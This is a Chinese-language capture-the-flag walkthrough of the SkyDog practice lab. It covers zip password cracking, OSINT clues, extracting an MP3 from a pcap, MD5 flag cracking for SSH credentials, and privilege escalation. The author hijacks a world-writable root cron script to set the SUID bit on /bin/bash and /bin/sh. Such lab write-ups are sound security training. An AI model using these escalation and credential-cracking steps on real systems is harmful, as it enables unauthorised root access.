found file 'flag.txt', (size cp/uc 50/ 38, flags 9, chk 874a)
found file 'QuesttoFindCosmo.txt', (size cp/uc 72/ 61, flags 9, chk 83b5)
PASSWORD FOUND!!!!: pw == yourmother
(老外的神人密码…)
拿到密码后咱们解压文件 拿flag
┌──(root㉿kali)-[/home/kali/Desktop]
└─# unzip Whistler.zip
Archive: Whistler.zip
[Whistler.zip] flag.txt password:
extracting: flag.txt
inflating: QuesttoFindCosmo.txt
┌──(root㉿kali)-[/home/kali/Desktop]
└─# cat flag.txt
flag{1871a3c1da602bf471d3d76cc60cdb9b}
┌──(root㉿kali)-[/home/kali/Desktop]
└─# cat QuesttoFindCosmo.txt
Time to break out those binoculars and start doing some OSINT
拿到第3个flag:flag{1871a3c1da602bf471d3d76cc60cdb9b} 同时拿到提示:OSINT(开放源情报)
OSINT
没什么头绪啊 感觉拿到的信息不够用了 再回去看了一下/Setec/页面的网站源码 发现给了一些提示
NSA-Agent-Abbott NSA特工Abbott 根据一系列的搜索 发现了一部名为Sneakers(通天神偷)的电影 在这个角色的引号下 提到了另一个名叫Whistler的角色 还提到了一个名为Cosmo的角色 参考在页面/Setec/的图像中 该图像包含too many secrets文字 这是电影 Sneakers中Setec Astronomy的字谜 所以需要从电影剧本 相关媒体 尤其是演员James Earl Jones中收集相关信息
老外这脑回路有说法的 不用太纠结 这里直接给结果是/PlayTronics/目录 直接访问
发现一个流量包文件和一个flag.txt文件,把2个文件都下载
拿到第4个flag:flag{c07908a705c22922e6d416e0e1107d99}
wireshark流量分析
使用工具wireshark打开companytraffic.pcap文件进行分析 该文件包含大量到Sound Cloud的HTTPS流量 以及托管相关资产的域的DNS查找 pcap的末尾是一个HTTP请求 用于下载MP3文件 这是从IP 54.239.172.25发送到IP 192.168.2.223的MP3文件 接下来按以下操作保存MP3文件(文件-->导出对象-->HTTP-->保存)
然后就是听力时间 (这是真的难听懂在说什么) 最后结合电影台词 Hi. My Name Is Werner Brandes. My Voice Is My Passport. Verify Me. 这里我们得到了用户名wernerbrandes但是不知道密码
MD5解密
有了用户名 但是没有密码 尝试暴力破解ssh登陆密码也没用 我们再次对前面的信息进行整合 发现我们拿到的flag貌似使用MD5加密 尝试解密前面发现的flag
使用在线工具解密 最后得到4个flag的信息为Welcome Home Bots yourmother leroybrown
GetShell
ssh登陆
用解密出来的信息依次尝试登陆 用户名使用wernerbrandes 最后确定凭证为:wernerbrandes:leroybrown
┌──(root㉿kali)-[~]
└─# ssh wernerbrandes@10.21.77.165
wernerbrandes@10.21.77.165's password:
Welcome to Ubuntu 14.04.3 LTS (GNU/Linux 3.19.0-25-generic x86_64)
* Documentation: https://help.ubuntu/
System information as of Thu Sep 11 21:08:02 EDT 2025
System load: 0.0 Processes: 122
Usage of /: 7.3% of 17.34GB Users logged in: 0
Memory usage: 4% IP address for eth0: 10.21.77.165
Swap usage: 0%
Graph this data and manage this system at:
https://landscape.canonical/
30 packages can be updated.
21 updates are security updates.
Last login: Fri Oct 30 19:08:28 2015 from 10.0.2.5
wernerbrandes@skydogctf:~$ ls
flag.txt
wernerbrandes@skydogctf:~$ cat flag.txt
flag{82ce8d8f5745ff6849fa7af1473c9b35}wernerbrandes@skydogctf:~$
拿到了第5个flag:flag{82ce8d8f5745ff6849fa7af1473c9b35} MD5解密得到Dr. Gunter Janek
提权
提权信息收集
先使用find命令搜索可写入文件 发现有个/lib/log/sanitizer.py脚本 查看脚本权限以及内容
wernerbrandes@skydogctf:~$ find / -perm -0002 -type f 2>/dev/null | grep -v "/proc/"
/lib/log/sanitizer.py
/sys/kernel/security/apparmor/.access
wernerbrandes@skydogctf:~$ ls -la /lib/log/sanitizer.py
-rwxrwxrwx 1 root root 96 Oct 27 2015 /lib/log/sanitizer.py
脚本属于root用户 主要目的是删除/tmp目录下的所有文件和子目录 猜测该脚本是按定时任务运行 以确保/tmp/目录定时清理
提权到root
因为该脚本拥有root权限 我们更新脚本把/bin/bash和/bin/sh二进制文件设置为SUID位 然后更改脚本如下:
wernerbrandes@skydogctf:~$ vim /lib/log/sanitizer.py
wernerbrandes@skydogctf:~$ cat /lib/log/sanitizer.py
#!/usr/bin/env python
import os
import sys
try:
os.system('rm -r /tmp/* ')
os.system('chmod u+s /bin/bash')
os.system('chmod u+s /bin/sh')
except:
sys.exit()
等待几分钟后 /bin/sh二进制文件 执行权限由x变为s
bash-4.3$ /bin/sh
# pwd
/
# whoami
root
# ls
bin boot dev etc home initrd.img lib lib64 lost+found media mnt opt proc root run sbin srv sys tmp usr var vmlinuz
# cd root
# ls
BlackBox
# cd BlackBox
# ls
flag.txt
# cat flag.txt
flag{b70b205c96270be6ced772112e7dd03f}
Congratulations!! Martin Bishop is a free man once again! Go here to receive your reward.
/CongratulationsYouDidIt#
执行/bin/sh 提权到root权限 拿到最后一个flag:flag{b70b205c96270be6ced772112e7dd03f}
作者留下的彩蛋
是一个电影片段 至此全过程结束
版权声明:本文标题:渗透靶场SkyDog学习详细过程分享 内容由热心网友自发贡献,该文观点仅代表作者本人, 转载请联系作者并注明出处:https://it.en369.cn/jiaocheng/1759886111a2828287.html, 本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容,一经查实,本站将立刻删除。
发表评论